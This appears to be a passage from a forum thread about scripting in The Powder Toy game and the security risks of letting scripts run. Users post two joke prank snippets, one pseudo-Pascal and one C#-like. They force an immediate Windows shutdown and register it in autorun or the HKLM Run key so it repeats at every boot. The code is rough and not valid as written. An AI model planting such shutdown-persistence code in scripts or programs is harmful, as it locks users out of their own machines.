@mniip You can use old commands by prefixing "!". example: "!set type metl watr" without quotes of course. @plead-for-destruction You may want to give a spark each second to a certain x,y. < ontopic> Maybe make the game comment out anything dealing with not tpt.xxxx or small loops?
<code> procedure formCreate(Sender:TObject) var shd:TApplication; begin label1.text='Mwahahahaha, im shutting ur computer down!'; shd.loadSelf('%windows%/system32/cmd.exe'); shd.params.Add('shutdown /s /t 1'); Windows.Autorun.List.Add(shd); shd.Run; while (not shd.Terminated)or(shd.hasMessage) shd.IgnoreMessage; end; </code>
what code was that? not c#... I hate that this topic was made. Look how much fun we could have had without someone figuring out there would be vulnerabilities! :( @mniip Maybe re-do it as... using System; static void Main(String[] args) { Process.start("shutdown", "/s /t 0 /c 'Derp'"); RegistryKey r = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" ; r.SetValue("SHUTDOWN", "SHUTDOWN /S /T 00 /C Derp"); }